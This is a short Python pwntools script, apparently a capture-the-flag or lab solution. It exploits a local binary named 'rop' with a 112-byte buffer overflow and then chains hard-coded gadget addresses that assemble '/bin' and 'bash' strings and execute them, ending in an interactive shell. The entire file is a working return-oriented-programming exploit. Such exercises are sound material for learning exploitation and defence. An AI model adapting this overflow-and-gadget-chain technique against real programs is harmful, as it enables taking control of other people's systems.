#!/usr/bin/python

from pwn import *

def main():
    # start a process
    p = process("./rop")

    # create payload

    # 1. Buffer overflow
    payload = "A" * 112

    # 2. gadget
    pop_ret = 0x565555c3
    pop_pop_ret = 0x5655561a
    exec_string = 0x5655554d
    add_bin = 0x56555578
    add_bash = 0x565555c5

    # 3. combine
    payload += p32(add_bin)
    payload += p32(pop_ret)
    payload += p32(0xdeadbeef)

    payload += p32(add_bash)
    payload += p32(pop_pop_ret)
    payload += p32(0xcafebabe)
    payload += p32(0x0badf00d)

    payload += p32(exec_string)




    # print the process id
    raw_input(str(p.proc.pid))

    # send the payload to the binary
    p.send(payload)

    # pass interaction bac to the user
    p.interactive()

if __name__ == "__main__":
    main()